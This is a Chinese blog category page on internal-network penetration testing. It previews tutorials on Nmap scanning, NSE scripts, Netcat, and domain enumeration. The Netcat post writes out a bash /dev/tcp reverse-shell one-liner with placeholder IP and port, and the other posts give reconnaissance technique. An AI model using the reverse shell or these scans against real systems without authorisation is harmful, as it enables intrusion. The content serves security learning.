内网渗透
文章平均质量分 75
无领
这个作者很懒,什么都没留下…
展开
-
Nmap指定网卡探测,工具ndiff,Zenmap使用
指定网卡探测,工具ndiff,Zenmap使用指定特定网卡进行对应的探测情景介绍指定网卡进行探测扫描结果对比 (ndiff)使用可视化nmap(Zenamp)使用配置扫描策略指定特定网卡进行对应的探测情景介绍Nmap是一款课扩展性强的工具,并且一些NSE脚本支持嗅探。但是这种功能需要网卡支持混杂模式才可以。或者当计算机上有两张网卡,并且两张网卡对应的不同网络。Nmap提供了切换使用特定网卡进行探测的参数 -e指定网卡进行探测命令nmap -e interface CIDRinterface原创 2021-01-16 21:20:10 · 2713 阅读 · 0 评论 -
Nmap NSE脚本使用
NSE脚本使用NSE介绍NSE使用探测web服务的title信息(http-title)探测http服务的http头(http-headers)NSE分类使用基本使用使用发现和版本信息分类进行探测排除某个脚本分类用其他分类脚本进行探测排除多个脚本分类用其他分类脚本进行探测NSE调试功能使用NSE参数使用NSE 更新NSE脚本分类NSE介绍NSE (Nmap Script Engine)Nmap脚本引擎,内置很多可以用来扫描的,针对特定任务的脚本,通过NSE可以不断拓展Nmap的扫描策略,加强Nmap的功原创 2021-01-16 19:32:03 · 1166 阅读 · 0 评论 -
Nmap端口探测技巧
端口探测技巧实际场景端口探测技巧对某个端口进行探测对多个端口进行探测扫描某个范围的端口对所有端口进行探测指定协议探测端口通过协议名来扫描端口通过协议名称范围进行扫描扫描注册在nmap中的端口实际场景在实际环境中,当系统管理员对设备进行管理时,或者渗透测试人员对设备进行检测是,并不一定需要对所有的服务进行操作。极有可能是对某个或某个范围的服务进行检测。如果不管什么情况都对所有服务进行探测,会出现耗时长,费力不讨好的情况。针对这种情况,可以使用Nmap来对服务进行更加灵活的探测,避免全端口探测对服务器造成压原创 2021-01-15 16:26:20 · 1571 阅读 · 0 评论 -
Nmap局域网主机存活发现
局域网主机存活发现主机发现使用命令结果输出主机发现一个局域网之中存在多台设备,获取哪些设备处于开机状态可以使用ping IP地址一个ip一个ip的去实验,但是如果一个网络很大的情况下,这样手工探测会非常耗时和麻烦。也可以使用不同的工具来进行批量探测。探测之前需要明白CIDR的含义。CIDR(无类别域路由)可以快速表示一个网络。比如:192.168.1.1/24表示在192.168.1.1到192.168.1.255之间的所有主机的IP地址。使用命令命令1nmap -sP CIDR命令2原创 2021-01-15 15:27:25 · 728 阅读 · 0 评论 -
Nmap识别目标机器上的服务指纹
Nmap识别目标机器上的服务指纹服务指纹识别服务指纹(-sV)Nmap的侵略性探测服务指纹为了确保有一个成功的渗透测试或网络设备监控,必须需要知道目标系统中服务的指纹信息。服务指纹信息包括服务端口,服务名和版本等。Nmap通过向目标主机发送多个UDP与TCP数据包并分析其响应来进行操作系统指纹识别工作。我们可以通过分析目标往Nmap发送的数据包中某些协议标记,选项和数据,推断发送这些数据包的操作系统等。识别服务指纹(-sV)使用命令namp -sV IP地址加了-sV参数之后,得到的数据会原创 2021-01-15 14:38:11 · 712 阅读 · 0 评论 -
Nmap列举远程机器开放端口
Nmap列举远程机器开放端口Nmap简介原理端口状态Nmap扫描技术查看zenamp扫描端口命令行的namp扫描端口使用指定的DNS服务器来对域名进行解析目标主机存活或防火墙开启(-Pn参数)扫描特定端口范围(-p)Nmap简介Nmap (网络映射器)用于发现计算机网络上的主机和服务,从而创建网络的“映射”。为了实现其目标,Nmap将特定数据包发送到目标主机,然后分析响应。我们可以通过Nmap探测服务器存活以及开发的服务,以及对目标进行安全审计。zenamp:Namp的图形界面版本。原理判断Nm原创 2021-01-14 22:42:59 · 776 阅读 · 1 评论 -
Netcat反弹shell
Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法#应用场景某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装nc时。基础介绍将liunx系统下的bash(shell)传递到window系统下的pc反弹shell:bash -i >& /dev/tcp/IP地址/端口 0>&1liunx主机连接window主机bash -i :已交互模式运行bash she原创 2021-01-14 16:58:34 · 634 阅读 · 0 评论 -
Netcat使用
Netcat使用简介基础使用方法实现简单的通信返回shell的使用简介Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。基础使用方法实现简单的通信创建服务端方法nc -l -p [localpost]-l:启动监听模式-p:监听某个端口的连接[localpost]:需要监听的端口创建一个客原创 2021-01-13 21:28:48 · 1586 阅读 · 0 评论 -
收集域内基础信息及域控制器的查找
收集域内基础信息及域控制器的查找收集域内基础信息1.查询域2.查询域内所有计算机3.查询域内所有用户组列表4.查询所有域成员计算机列表5.获取域密码信息6.获取域信任信息查找域控制器1.查看域控制器的机器名2.查看域控制器的主机名3.查看当前时间4.查看域控制器组收集域内基础信息以下查询命令在本质上都是通过LDAP协议到域控制器上进行查询的,所以在查询时需要进行权限认证。只有域用户才拥有此权限,本地用户无法运行介绍的查询命令。System权限用户除外。LDAP: 轻量级目录访问协议。约定了Client原创 2021-01-14 17:00:01 · 1052 阅读 · 0 评论 -
域内存活主机测试及域内端口扫描
域内存活主机探测利用NetBIOS快速探测内网利用ICMP协议快速探测内网快速ARP扫描探测内网arp-scan工具Empire中的arpscan模块Nishang中的Invoke-ARPScan.ps1脚本通过常规TCP/UDP端口扫描探测内网内网存活主机探测是内网渗透测试中不可缺少的一个环节。一般可以在白天或晚上分别进行探测,以对比分析存活主机和对应ip地址。利用NetBIOS快速探测内网NetBIOS是局域网程序使用的一种应用程序编程端口(API),为程序提供了请求低级别服务的统一的命令集,为局原创 2020-12-09 15:51:26 · 2511 阅读 · 1 评论 -
内网信息收集(手动收集本机信息)
内网信息收集概述收集本机信息手动收集本机信息查询网络配置信息查询操作系统及软件的信息查询本机服务信息查询进程列表查看启动程序信息查看计划任务查看主机开机时间查询用户列表概述内网信息收集需要判断三个方面:对当前机器角色的判断;对当前机器所处网络环境的拓扑结构进行分析和判断;对当前机器所在区域的判断。对当前机器角色的判断:是指判断当前机器是普通Web服务器,开发测试服务器,公共服务器,文件服务器,代理服务器,DNS服务器还是储存服务器等。对当前机器所处网络环境的拓扑结构进行分析和判断:是指对所处内原创 2020-12-01 21:37:32 · 1372 阅读 · 1 评论